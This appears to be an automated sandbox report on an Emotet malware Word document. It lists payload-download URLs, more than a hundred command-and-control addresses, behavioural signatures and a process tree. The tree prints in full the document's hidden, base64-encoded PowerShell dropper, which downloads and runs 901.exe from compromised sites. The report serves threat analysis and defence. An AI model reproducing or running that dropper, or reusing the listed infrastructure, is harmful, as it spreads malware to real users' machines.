Analysis
-
max time kernel
25s -
resource
win10v191014 -
submitted
16-01-2020 16:51
General
Malware Config
Extracted
https://guilhermebasilio.com/wp-content/LH/
http://pbs.onsisdev.info/wp-content/uploads/z8Jm5LOp/
http://niuconstruction.net/toolsl/k7NjE10245/
http://panvelpropertyproject.com/calendar/7g6f/7g6f/
http://demo.artesfide.com/cgi-bin/SXllAKyx9u/
Extracted
emotet
70.123.95.180:80
190.17.44.48:80
59.120.5.154:80
192.241.143.52:8080
159.65.241.220:8080
45.79.95.107:443
69.163.33.84:8080
181.36.42.205:443
113.190.254.245:80
190.195.129.227:8090
50.28.51.143:8080
204.225.249.100:7080
99.252.27.6:80
185.160.229.26:80
77.55.211.77:8080
68.187.160.28:443
152.231.89.226:80
86.123.138.76:80
82.196.15.205:8080
80.11.158.65:8080
189.19.81.181:443
119.59.124.163:8080
109.169.86.13:8080
37.187.6.63:8080
190.186.164.23:80
110.142.161.90:443
82.152.149.79:80
190.100.153.162:443
139.162.118.88:8080
91.205.215.57:7080
203.25.159.3:8080
91.74.175.46:80
185.160.212.3:80
181.167.96.215:80
94.176.234.118:443
72.29.55.174:80
2.45.112.134:80
190.191.82.216:80
58.171.38.26:80
79.7.114.1:80
2.47.112.72:80
144.139.56.105:80
93.144.226.57:80
188.135.15.49:80
212.71.237.140:8080
45.73.157.243:8080
151.237.36.220:80
139.47.135.215:80
186.177.165.196:443
68.183.170.114:8080
91.83.93.124:7080
186.15.83.52:8080
79.7.158.208:80
110.170.65.146:80
191.183.21.190:80
201.213.32.59:80
120.150.247.164:80
185.86.148.222:8080
190.219.149.236:80
81.213.78.151:443
207.154.204.40:8080
70.184.69.146:80
181.29.101.13:8080
177.103.159.44:80
82.8.232.51:80
190.210.184.138:995
14.201.35.38:80
185.94.252.12:80
186.68.48.204:443
46.28.111.142:7080
125.99.61.162:7080
203.130.0.69:80
94.200.114.162:80
200.45.187.90:80
2.42.173.240:80
217.199.160.224:8080
189.26.118.194:80
186.15.52.123:80
68.183.190.199:8080
58.162.218.151:80
114.109.179.60:80
187.54.225.76:80
172.104.169.32:8080
81.16.1.45:80
188.218.104.226:80
191.103.76.34:443
181.129.96.162:990
149.62.173.247:8080
192.241.146.84:8080
200.82.170.231:80
89.32.150.160:8080
68.174.15.223:80
175.114.178.83:443
129.205.201.163:80
202.62.39.111:80
216.251.83.79:80
187.188.166.192:8080
5.196.35.138:7080
87.106.77.40:7080
5.88.27.67:8080
178.79.163.131:8080
181.30.61.163:80
188.216.24.204:80
76.69.26.71:80
189.201.197.98:8080
200.123.183.137:443
94.200.126.42:80
177.242.21.126:80
62.75.143.100:7080
37.120.185.153:443
118.36.70.245:80
200.55.53.7:80
91.117.159.233:80
200.58.83.179:80
142.93.114.137:8080
181.231.220.232:80
190.210.236.139:80
85.105.241.192:80
87.106.46.107:8080
83.35.213.87:7080
165.228.195.93:80
179.208.84.218:8080
96.61.113.203:80
201.213.100.141:8080
190.151.5.130:443
97.120.32.227:80
86.42.166.147:80
Signatures
-
Process spawned unexpected child process 1 IoCs
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4056 4320 Powershell.exe 74 -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4056 Powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 4056 Powershell.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 4056 wrote to memory of 4696 4056 Powershell.exe 80 PID 4696 wrote to memory of 3848 4696 901.exe 81 -
Suspicious behavior: EmotetMutantsSpam 1 IoCs
pid Process 3848 901.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 4956 WINWORD.EXE 4696 901.exe 3848 901.exe -
Executes dropped EXE 2 IoCs
pid Process 4696 901.exe 3848 901.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4956 WINWORD.EXE
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5c21b8911225705df6195bf0dbf4ed16a01ac8aec18c1b5041601abca1104a96.doc" /o ""1⤵
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Checks processor information in registry
- Suspicious behavior: AddClipboardFormatListener
PID:4956
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABKAHgAdwB5AHYAdQBhAHkAZQBnAG0AagBrAD0AJwBGAG4AaQBpAGIAZABsAHkAYQBxAHcAbgAnADsAJABOAGoAYwB3AGgAawB2AGEAIAA9ACAAJwA5ADAAMQAnADsAJABZAGMAbQBvAGoAcgB1AG0AbAB6AGkAYgA9ACcATgBlAHoAbgBlAGMAeABuAHIAagAnADsAJABEAHgAbQB0AHAAcQBrAGgAdQBpAHoAbgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQATgBqAGMAdwBoAGsAdgBhACsAJwAuAGUAeABlACcAOwAkAFoAdgBpAHoAaABjAHcAbQBoAGsAdwB2AGUAPQAnAEIAdwBqAHQAYgBjAG0AbQBsAHgAJwA7ACQATABlAGUAaQBtAGQAdgBhAGoAPQAmACgAJwBuAGUAdwAtAG8AYgAnACsAJwBqACcAKwAnAGUAYwB0ACcAKQAgAG4ARQB0AC4AVwBFAGIAQwBsAGkARQBuAFQAOwAkAEMAYgBrAHQAagBnAGIAcABnAHcAaQBpAHcAPQAnAGgAdAB0AHAAcwA6AC8ALwBnAHUAaQBsAGgAZQByAG0AZQBiAGEAcwBpAGwAaQBvAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8ATABIAC8AKgBoAHQAdABwADoALwAvAHAAYgBzAC4AbwBuAHMAaQBzAGQAZQB2AC4AaQBuAGYAbwAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB1AHAAbABvAGEAZABzAC8AegA4AEoAbQA1AEwATwBwAC8AKgBoAHQAdABwADoALwAvAG4AaQB1AGMAbwBuAHMAdAByAHUAYwB0AGkAbwBuAC4AbgBlAHQALwB0AG8AbwBsAHMAbAAvAGsANwBOAGoARQAxADAAMgA0ADUALwAqAGgAdAB0AHAAOgAvAC8AcABhAG4AdgBlAGwAcAByAG8AcABlAHIAdAB5AHAAcgBvAGoAZQBjAHQALgBjAG8AbQAvAGMAYQBsAGUAbgBkAGEAcgAvADcAZwA2AGYALwA3AGcANgBmAC8AKgBoAHQAdABwADoALwAvAGQAZQBtAG8ALgBhAHIAdABlAHMAZgBpAGQAZQAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAFMAWABsAGwAQQBLAHkAeAA5AHUALwAnAC4AIgBzAGAAcABMAEkAdAAiACgAJwAqACcAKQA7ACQAQQB1AGwAawBjAHUAbABzAHoAZABsAHMAPQAnAFcAZQBkAGgAZABpAGQAcgB2ACcAOwBmAG8AcgBlAGEAYwBoACgAJABEAGsAYwB6AHMAYgBlAGYAcAB0AGsAIABpAG4AIAAkAEMAYgBrAHQAagBnAGIAcABnAHcAaQBpAHcAKQB7AHQAcgB5AHsAJABMAGUAZQBpAG0AZAB2AGEAagAuACIAZABPAGAAdwBuAGAATABPAEEARABmAGAASQBsAEUAIgAoACQARABrAGMAegBzAGIAZQBmAHAAdABrACwAIAAkAEQAeABtAHQAcABxAGsAaAB1AGkAegBuACkAOwAkAFAAcwB2AG0AaQB3AGMAaABqAD0AJwBXAHoAdQBhAHQAaABsAHgAbABxAG8AdwAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAEQAeABtAHQAcABxAGsAaAB1AGkAegBuACkALgAiAEwAYABFAGAATgBnAFQAaAAiACAALQBnAGUAIAAyADQAMgA0ADMAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwB0AGAAQQBSAFQAIgAoACQARAB4AG0AdABwAHEAawBoAHUAaQB6AG4AKQA7ACQARAB0AHEAcABpAHkAdgBjAG0AYwA9ACcAUQBnAGoAawB3AGoAZQBpAGUAJwA7AGIAcgBlAGEAawA7ACQAUAB3AGcAeQBmAHMAYgB2AD0AJwBaAHQAagBxAHQAbgB0AGIAeAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABDAGIAdgBxAGIAZgByAG4AYQB5AGUAcABxAD0AJwBCAGEAcABrAGsAZwBhAGEAcQBuAHoAdQAnAA==1⤵
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4056 -
C:\Users\Admin\901.exe"C:\Users\Admin\901.exe"2⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
PID:4696 -
C:\Users\Admin\901.exe--e3d511183⤵
- Suspicious behavior: EmotetMutantsSpam
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
PID:3848
-
-